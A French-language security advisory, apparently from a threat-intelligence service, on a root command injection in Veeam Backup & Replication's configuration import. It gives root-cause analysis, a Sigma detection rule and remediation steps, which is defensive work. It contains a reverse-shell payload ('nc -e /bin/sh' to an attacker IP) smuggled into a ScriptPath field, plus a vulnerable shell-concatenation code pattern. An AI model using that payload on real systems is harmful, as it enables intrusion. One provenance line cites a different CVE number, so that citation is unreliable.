CVE-2025-55125 : injection de commandes root via configuration de sauvegarde dans Veeam Backup & Replication
HERMES THREAT SCORE & RISQUE DE GESTION DE CONFIGURATION
Cible :Composant d'importation et validation des configurations de sauvegarde Veeam Hermes évalue la CVE-2025-55125 à un HTS de 86 (ÉLEVÉ). Cette faille autorise un compte opérateur non administrateur à acquérir les privilèges root sur les serveurs de sauvegarde Linux ou les proxies distants. L'injection réside directement dans le désérialiseur de configuration de tâches, permettant une élévation de privilèges radicale à partir d'un simple accès restreint.
CVE-2025-55125: Root Command Injection via Backup Configuration in Veeam Backup & ReplicationVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in Veeam Backup & Replication documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Métadonnées et surface d’attaque
Section intitulée « 1. Métadonnées et surface d’attaque »| Paramètre | Spécification technique | Impact opérationnel |
|---|---|---|
| Identifiant CVE | CVE-2025-55125 | Identifiant officiel NVD / MITRE |
| Avis de sécurité éditeur | Veeam KB4716 | Correctif cumulatif pour VBR v13 |
| Sous-système affecté | Configuration Engine / Job Template Ingestion | Traitement des configurations de sauvegarde |
| Versions affectées | VBR 13.x $\le$ 13.0.1.180 | Installations Linux et proxies renforcés |
| Version corrigée | Veeam Backup & Replication 13.0.1.1071 | Mise à niveau recommandée |
| Type de vulnérabilité | CWE-78 : OS Command Injection | Élévation locale vers superutilisateur |
| Rôle minimal requis | Backup Operator ou Tape Operator | Accès restreint au plan de sauvegarde |
| Privilèges obtenus | root (Linux) / SYSTEM (Windows) | Contrôle complet de l’hôte physique ou virtuel |
2. Analyse technique de la cause racine
Section intitulée « 2. Analyse technique de la cause racine »Le moteur d’orchestration de sauvegarde permet d’associer des scripts de pré-gel (pre-freeze) et de post-dégel (post-thaw) lors de la création de sauvegardes cohérentes au niveau applicatif.
Chaîne d'injection de commandes dans la CVE-2025-55125 :
┌────────────────────────────────────────────────────────┐ │ Opérateur de sauvegarde (Backup Operator) │ └───────────────────────────┬────────────────────────────┘ │ Importation d'un modèle de configuration XML/JSON │ Champ : ScriptPath = "/bin/true; nc -e /bin/sh 10.10.14.5 9001" ▼ ┌────────────────────────────────────────────────────────┐ │ Service Veeam Backup (Exécution root) │ │ 1. Désérialisation du modèle de configuration │ │ 2. Passage du chemin vers Process.Start("/bin/sh") │ │ 3. Absence de validation stricte d'échappement │ └───────────────────────────┬────────────────────────────┘ │ Exécution du shell enfant ▼ ┌────────────────────────────────────────────────────────┐ │ Shell root interactif obtenu par l'attaquant │ └────────────────────────────────────────────────────────┘Mécanisme de l’injection
Section intitulée « Mécanisme de l’injection »Lors de l’analyse du fichier de configuration importé, le parseur extrait les chaînes de paramètres associées aux scripts de quiescence sans vérifier qu’il s’agit de chemins d’accès statiques existants :
// Modèle de code vulnérable :string scriptCommand = config.PreFreezeScript;ProcessStartInfo psi = new ProcessStartInfo("/bin/sh", "-c " + scriptCommand) { UseShellExecute = false, RedirectStandardOutput = true};Process.Start(psi);L’utilisation de -c couplée à la concaténation directe permet à n’importe quel opérateur d’insérer des séparateurs de commandes (;, &&, |) pour déclencher une exécution de code arbitraire immédiate avec les droits du service parent (root).
3. Détection et surveillance
Section intitulée « 3. Détection et surveillance »Règle Sigma : détection d’injection de commande shell par Veeam
Section intitulée « Règle Sigma : détection d’injection de commande shell par Veeam »title: Injection de commande shell depuis le service Veeamid: cve-2025-55125-veeam-cmd-injectionstatus: experimentaldescription: Détecte l'exécution d'interpréteurs de commandes enfants anormaux depuis les démons Veeamreferences: - https://www.veeam.com/kb4716logsource: category: process_creation product: linuxdetection: selection: ParentImage|endswith: - '/veeamsvc' - '/VeeamDeploymentService' Image|endswith: - '/bin/sh' - '/bin/bash' - '/usr/bin/nc' - '/usr/bin/python3' CommandLine|contains: - ';' - '&&' - '|' - 'nc -' condition: selectionlevel: critical4. Mesures de remédiation
Section intitulée « 4. Mesures de remédiation »- Application du correctif KB4716 : mettre à niveau les serveurs vers la version 13.0.1.1071.
- Désactivation des scripts pré/post personnalisés : dans les environnements à haute sécurité, interdire l’usage de scripts de pré-gel/dégel non signés via les stratégies de groupe Veeam.
- Audit des configurations importées : restreindre l’importation de fichiers de configuration aux seuls comptes administrateurs principaux.
5. Références
Section intitulée « 5. Références »- Avis officiel Veeam Software : Veeam Security Bulletin KB4716
- Référentiel NVD : CVE-2025-55125 Detail